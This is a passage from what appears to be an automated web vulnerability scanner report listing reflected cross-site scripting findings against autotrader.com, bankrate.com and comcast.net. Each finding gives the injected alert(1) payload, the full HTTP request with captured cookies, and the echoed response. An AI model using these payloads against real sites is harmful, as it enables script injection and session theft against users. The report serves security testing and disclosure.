Set-Cookie: ATC_ID=174.121.222.18.1292783429221107; path=/; expires=Fri, 28-Nov-14 18:30:29 GMT; domain=.autotrader.com
Set-Cookie: JSESSIONID=658315DCED88B718A593EBD8446E3348; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Mon, 26-Dec-2011 18:30:29 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3895617034.61475.0000; path=/
Content-Length: 58070


<!DOCTYPE html P
...[SNIP]...
<script type="text/javascript">
BIRFPageData = {
pg_inst:"797433936860309222",
logDomain:"http://www.autotrader.com",
my:false,
params:{
"19533";alert(1)//bdc50d644ac":"1",
"disableImpressions":"false"
}
};
</script>
...[SNIP]...

2.132. http://www.bankrate.com/compare-rates.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /compare-rates.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e52be"style="x:expression(alert(1))"0d77ae31848 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /compare-rates.aspx?e52be"style%3d"x%3aexpression(alert(1))"0d77ae31848=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: d-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=900
Date: Sun, 19 Dec 2010 18:09:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/compare-rates.aspx?e52be"style="x:expression(alert(1))"0d77ae31848=1" />
...[SNIP]...

2.133. http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankrate.com
Path:   /finance/auto/gas-savers-still-getting-fed-tax-credit.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7dac"style%3d"x%3aexpression(alert(1))"881260241e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7dac"style="x:expression(alert(1))"881260241e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /finance/auto/gas-savers-still-getting-fed-tax-credit.aspx?e7dac"style%3d"x%3aexpression(alert(1))"881260241e5=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: d-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=900
Date: Sun, 19 Dec 2010 18:09:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx?e7dac"style="x:expression(alert(1))"881260241e5=1" />
...[SNIP]...

2.134. http://www.comcast.net/articles/entertainment-eonline/20101219/b217076/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment-eonline/20101219/b217076/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ba35<img%20src%3da%20onerror%3dalert(1)>f7f7658c830 was submitted in the REST URL parameter 2. This input was echoed as 5ba35<img src=a onerror=alert(1)>f7f7658c830 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment-eonline5ba35<img%20src%3da%20onerror%3dalert(1)>f7f7658c830/20101219/b217076/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:17 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'eonline5ba35<img src=a onerror=alert(1)>f7f7658c830'</h2>
...[SNIP]...

2.135. http://www.comcast.net/articles/entertainment-movies/20101217/US.People.Randy.Quaid/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment-movies/20101217/US.People.Randy.Quaid/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3514c<img%20src%3da%20onerror%3dalert(1)>4bfe6550562 was submitted in the REST URL parameter 2. This input was echoed as 3514c<img src=a onerror=alert(1)>4bfe6550562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment-movies3514c<img%20src%3da%20onerror%3dalert(1)>4bfe6550562/20101217/US.People.Randy.Quaid/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:19 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'movies3514c<img src=a onerror=alert(1)>4bfe6550562'</h2>
...[SNIP]...

2.136. http://www.comcast.net/articles/entertainment/20090708/entertainment.slideshows.001/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment/20090708/entertainment.slideshows.001/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f023<img%20src%3da%20onerror%3dalert(1)>cfb7aba146 was submitted in the REST URL parameter 2. This input was echoed as 7f023<img src=a onerror=alert(1)>cfb7aba146 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment7f023<img%20src%3da%20onerror%3dalert(1)>cfb7aba146/20090708/entertainment.slideshows.001/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:21 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment7f023<img src=a onerror=alert(1)>cfb7aba146' subchannel'home'</h2>
...[SNIP]...

2.137. http://www.comcast.net/articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c9ac<img%20src%3da%20onerror%3dalert(1)>8179713037 was submitted in the REST URL parameter 2. This input was echoed as 1c9ac<img src=a onerror=alert(1)>8179713037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment1c9ac<img%20src%3da%20onerror%3dalert(1)>8179713037/20101219/AS.Fiji.Oprah.Winfrey/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:21 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment1c9ac<img src=a onerror=alert(1)>8179713037' subchannel'home'</h2>
...[SNIP]...

2.138. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b8ac<img%20src%3da%20onerror%3dalert(1)>b442b71f699 was submitted in the REST URL parameter 2. This input was echoed as 9b8ac<img src=a onerror=alert(1)>b442b71f699 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-boxing9b8ac<img%20src%3da%20onerror%3dalert(1)>b442b71f699/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:46 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'boxing9b8ac<img src=a onerror=alert(1)>b442b71f699'</h2>
...[SNIP]...

2.139. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f67ef'%3bfefd803c823 was submitted in the REST URL parameter 2. This input was echoed as f67ef';fefd803c823 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-boxingf67ef'%3bfefd803c823/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:42 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
/', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/boxingf67ef';fefd803c823/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.140. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a02"%3bc6b15b7f637 was submitted in the REST URL parameter 2. This input was echoed as e2a02";c6b15b7f637 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-boxinge2a02"%3bc6b15b7f637/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:40 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
sAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/boxinge2a02";c6b15b7f637/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.141. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30dd3"%3b57c65471a56 was submitted in the REST URL parameter 2. This input was echoed as 30dd3";57c65471a56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-cbk30dd3"%3b57c65471a56/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:44 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/cbk30dd3";57c65471a56/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.142. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da67d'%3bde5beb5d510 was submitted in the REST URL parameter 2. This input was echoed as da67d';de5beb5d510 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-cbkda67d'%3bde5beb5d510/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:45 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:45 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/cbkda67d';de5beb5d510/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.143. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

